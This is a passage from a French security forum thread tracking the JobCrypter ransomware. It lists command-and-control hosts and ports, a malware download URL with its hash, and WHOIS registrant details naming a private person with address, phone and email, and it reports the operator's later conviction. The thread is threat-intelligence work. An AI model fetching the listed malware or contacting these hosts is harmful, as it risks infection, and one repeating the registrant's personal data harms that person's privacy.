→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:31/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:32/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:33/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:34/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:35/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:36/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:37/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:1219/TCP


Liens connexes:
http://research.zscaler.com/2016/01/yet ... pymel.html
Malekal_morte
Messages : 116316
Inscription : 10 sept. 2005 13:57

Re: JobCrypter & les activités carding de djamel au bled

par Malekal_morte »

Merci ѠOOT pour toutes ces informations.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116316
Inscription : 10 sept. 2005 13:57

Re: JobCrypter & les activités carding de djamel au bled

par Malekal_morte »

Cette semaine, une nouvelle campagne a eu lieu.
Le ransomware utilise l'extension .CSS donc j'ai mis à jour la fiche de ce dernier :
=> http://forum.malekal.com/jobcrypter-gen ... ml#p419085
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
ѠOOT

Re: JobCrypter & les activités carding de djamel au bled

par ѠOOT »

HAGROUNASADIKI.COM ( 217.160.0.2 )

Created on 2015-12-12 - Expires on 2017-05-15 - Updated on 2016-05-15

Registrant Name: Celine Courbot
Registrant Street: 5 rue du mont mirel
Registrant City: MAROMME
Registrant Postal Code: 76150
Registrant Country: FRANCE
Registrant Phone: 06.69.12.00.35
Registrant Email: celine.courbot@sfr.fr

% DNS Keywords Analysis : "hagrouna"+"sadiki"

Phrase culte en Algérie : prononcée par un supporter algérien au stade d'Oum Dourman lors du match de barrage Algérie-Egypte durant les qualifications pour la Coupe du monde en novembre 2009.
→ http://hagrounasadiki.com/sBuild1.exe 84F2B1EF959D96970C899E581905C333 ( 16 May 2016 01:15:13 )

Image

Le "svchost.exe" est signé par HOTEL RESTAURANT LA TREILLE

Image

→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:1244/TCP
Malekal_morte
Messages : 116316
Inscription : 10 sept. 2005 13:57

Re: JobCrypter & les activités carding de djamel au bled

par Malekal_morte »

Il finit en prison : https://www.zdnet.fr/actualites/il-visa ... 951410.htm
Un Algérien de 36 ans vient d’être condamné à deux ans de prison pour 10 attaques par rançongiciel menées contre des entreprises françaises avec JobCrypter.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Avatar de l’utilisateur
Parisien_entraide
Messages : 20271
Inscription : 02 juin 2012 20:48
Localisation : Thomas Anderson : Je suis dans et en dehors de la matrice :-)

Re: JobCrypter & les activités carding de djamel au bled

par Parisien_entraide »

Si on lit :
Il a été condamné à deux ans de prison et 5 000 euros d’amende par le tribunal judiciaire de Paris. J
ugé par défaut, en son absence, ce vendredi 16 décembre, le hacker malveillant est également désormais sous le coup d’un mandat d’arrêt.

Les 5 000 euros ne couvrent pas ce qu'il a extorqué, on ne sait si c'est 2 ans fermes ou pas et en plus il est sous le coup d'un mandat d'arrêt alors que les autorités algériennes l'avaient attrapé en .. février 2021 !

Bref ils n'ont pas à se gêner
- Only Amiga... Was possible ! Lien https://forum.malekal.com/viewtopic.php?t=60830
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )

Revenir à « Tech, Tips & Tricks »